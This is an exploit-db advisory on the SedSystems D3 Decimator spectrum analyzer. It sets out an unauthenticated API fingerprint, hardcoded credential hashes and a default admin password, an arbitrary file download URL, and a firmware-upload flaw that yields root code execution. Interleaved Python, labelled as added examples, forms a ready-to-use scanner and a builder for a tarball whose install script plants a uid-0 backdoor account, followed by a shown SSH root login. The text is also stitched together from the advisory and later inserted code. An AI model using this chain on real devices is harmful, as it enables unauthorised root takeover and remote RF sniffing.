SedSystems D3 Decimator – Multiple Vulnerabilities

  • Author: prdelka
    Date: 2016-01-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41877/
  • SedSystems D3 Decimator Multiple Vulnerabilities
    ================================================
    Vulnerable devices can be identified by scanning for TCP port 9784, 
    which by default exposes the device's remote API. On connect the device 
    announces itself with "connected" (or similar) and then accepts plain-text 
    commands such as "status" and "ping" without any login step, as this 
    telnet session shows:
    
    Connected to x.x.x.x.
    Escape character is '^]'.
    connected
    status
    status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
    ping
    ping:ok
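    The fingerprint described above, written out as a small Python probe. This is an added example, not code from the advisory or from SED Systems: it expects the "connected" banner, checks that "ping" returns "ping:ok", and splits the "status" reply into its comma-separated fields (their meanings are not documented on this page). The mock device is constructed here so the probe can be exercised offline; its "error" reply for unknown commands and the use of bare "\n" line endings are assumptions.

```python
import socket
import threading

API_PORT = 9784  # default remote-API port named in the advisory

# Replayed verbatim from the telnet transcript above by the mock device below.
SAMPLE_STATUS = b"status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0"


def _readline(sock, maxlen=4096):
    """Read one newline-terminated line a byte at a time (no read-ahead, so the
    same socket can be reused for the next command)."""
    buf = b""
    while len(buf) < maxlen:
        ch = sock.recv(1)
        if not ch:
            break
        buf += ch
        if ch == b"\n":
            break
    return buf.rstrip(b"\r\n")


def probe_decimator(host, port=API_PORT, timeout=3.0):
    """Fingerprint a D3 Decimator remote API: expect the 'connected' banner,
    then 'ping' -> 'ping:ok', then collect the 'status' line.  Returns a dict,
    or None if the service does not behave like the device (or times out)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if _readline(s) != b"connected":
                return None
            s.sendall(b"ping\n")
            if _readline(s) != b"ping:ok":
                return None
            s.sendall(b"status\n")
            status = _readline(s)
    except OSError:  # refused, reset, timed out, ...
        return None
    if not status.startswith(b"status:"):
        return None
    fields = status[len(b"status:"):].decode("ascii", "replace").split(",")
    return {"host": host, "port": port, "status_fields": fields}


def start_mock_device(banner=b"connected", status=SAMPLE_STATUS):
    """Constructed stand-in for the device so the probe runs offline.  Serves
    one client on an ephemeral localhost port and returns that port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner + b"\n")
            while True:
                cmd = _readline(conn)
                if not cmd:          # peer closed (or sent an empty line)
                    break
                if cmd == b"ping":
                    conn.sendall(b"ping:ok\n")
                elif cmd == b"status":
                    conn.sendall(status + b"\n")
                else:
                    conn.sendall(b"error\n")  # assumed reply, not from the advisory
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    mock_port = start_mock_device()
    print(probe_decimator("127.0.0.1", mock_port))
```

    Against a real target, call probe_decimator(host) with the default port; a None result means the service either did not present the banner or did not answer "ping" the way the device does, which keeps generic telnet-style services from being misidentified.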
    
    The web service provides a user interface to the RF spectrum analyzer. 
    The remote API on port 9784 can also hand out raw I/Q samples, so anyone 
    who can reach it can sniff the RF spectrum remotely. The Web 
    Configuration Manager lives at "/cgi-bin/wcm.cgi". Multiple 
    vulnerabilities exist.
    
    Hardcoded credentials are present in the /etc/passwd file shipped in the 
    default firmware since at least February 2013; the password hashes are 
    stored directly in /etc/passwd as MD5-crypt ("$1$") hashes. The entries 
    are:
    
    root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
    admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly
    
    The admin user's default password is "admin". The root password is not 
    known at the time of writing, and there is no documented way to change 
    it on the device. Note from the entries above that admin's login shell is 
    /bin/webonly, so that account is only usable against the web interface, 
    and that its hash has an empty salt ("$1$$..."). Using the "admin" 
    credentials you can obtain a web session to wcm.cgi and exploit a hidden 
    arbitrary file download vulnerability discovered by reverse engineering 
    the firmware:
    
    http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd
    
    This lets you download any file, and because the "admin" web session 
    runs with root privileges every file on the device is readable, 
    including /etc/passwd with the root hash shown above. To execute 
    arbitrary code you can abuse a flaw in the firmware flash routine. If 
    you upload a firmware tarball that contains an "install" script at its 
    root, the device accepts the upload, unpacks it, and runs ./install as 
    root if it exists and is executable; you can then cancel the "flash" 
    process so the device is neither bricked nor modified. The problem lies 
    in /usr/bin/install_flash which, after using "tar" to unpack the archive 
    into a temporary folder /tmp/PID_of_tar, does the following:
    
    # If the archive contained its own install script then use that

    if [ -x ./install ]; then
        ./install $all_args
        rc=$?
        exit $rc
    fi

    
    Using this vulnerability you can upload a .tar file containing an install 
    script like the one below to add a uid-0 account, adm1n, with the 
    password admin. Make the file executable (chmod +x install) before 
    packing it, because install_flash only runs it when the -x test 
    succeeds.
    
    $ cat install 
    #!/bin/sh
    # Same MD5-crypt hash as the stock admin account, so the password is "admin"
    echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd
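    
    As an added example (not the advisory's own tooling), the following Python builds the firmware tarball described above and checks it the way install_flash would: the script must sit at the archive root, be named install, and carry an execute bit, or the [ -x ./install ] test fails and nothing runs. The install script body is the one from the advisory; the archive layout the device expects beyond that file, and the checker itself, are assumptions rather than facts taken from the firmware.

```python
import io
import posixpath
import tarfile

# Same MD5-crypt hash as the stock "admin" account in the firmware's
# /etc/passwd, so the new uid-0 user logs in with the password "admin".
INSTALL_SCRIPT = b"""#!/bin/sh
# Executed as root by /usr/bin/install_flash from /tmp/<pid>/ after untar.
echo 'adm1n:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh' >> /etc/passwd
"""


def build_firmware_tarball(install_script=INSTALL_SCRIPT, name="install", mode=0o755):
    """Return the bytes of a tar archive carrying an install script.  The
    defaults produce what install_flash needs: the file at the archive root,
    named 'install', with execute bits set, so [ -x ./install ] passes and the
    script runs instead of the normal flash routine.  'name' and 'mode' are
    parameters only so the checker below can be shown rejecting bad layouts."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=name)
        info.size = len(install_script)
        info.mode = mode
        tar.addfile(info, io.BytesIO(install_script))
    return buf.getvalue()


def check_tarball(data):
    """Replay install_flash's decision on an archive: after unpacking into a
    scratch directory, would ./install exist and be executable?  Returns
    (True, script_text) when it would run, else (False, reason)."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for m in tar.getmembers():
            # "install" and "./install" both land at the root after extraction
            if posixpath.normpath(m.name) == "install" and m.isfile():
                # root runs the script, and for root any execute bit satisfies -x
                if not m.mode & 0o111:
                    return False, "install present but not executable (-x fails)"
                body = tar.extractfile(m).read()
                if not body.startswith(b"#!"):
                    return False, "install has no interpreter line"
                return True, body.decode()
    return False, "no install at the archive root"


if __name__ == "__main__":
    tarball = build_firmware_tarball()
    ok, detail = check_tarball(tarball)
    print("would run:", ok)
    print(detail)
    with open("decimator_install.tar", "wb") as fh:  # what gets uploaded as "firmware"
        fh.write(tarball)
```

    The checker is worth running before every upload: a script packed from a working tree where the execute bit was lost, or nested one directory down because the archive was created from the parent folder, is accepted by the device and then silently ignored.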
    
    You can then SSH in as adm1n: PermitRootLogin is enabled by default, and 
    since adm1n has uid 0 the login is allowed.
    
    E.g.
    
    $ ssh -l adm1n x.x.x.x
    adm1n@x.x.x.x's password: admin
    # uname -a
    Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux
    # cat /proc/cpuinfo
    Processor	: ARM926EJ-S rev 4 (v5l)
    BogoMIPS	: 103.83
    Features	: swp half thumb fastmult vfp edsp java 
    CPU implementer	: 0x41
    CPU architecture: 5TEJ
    CPU variant	: 0x0
    CPU part	: 0x926
    CPU revision	: 4
    
    Hardware	: SED 32XX Based CCA
    Revision	: 0000
    Serial		: 0000000000000000
    # 
    
    Vendor website can be found at the following url:
    * http://www.sedsystems.ca/decimator_spectrum_analyzer
    
     -- prdelka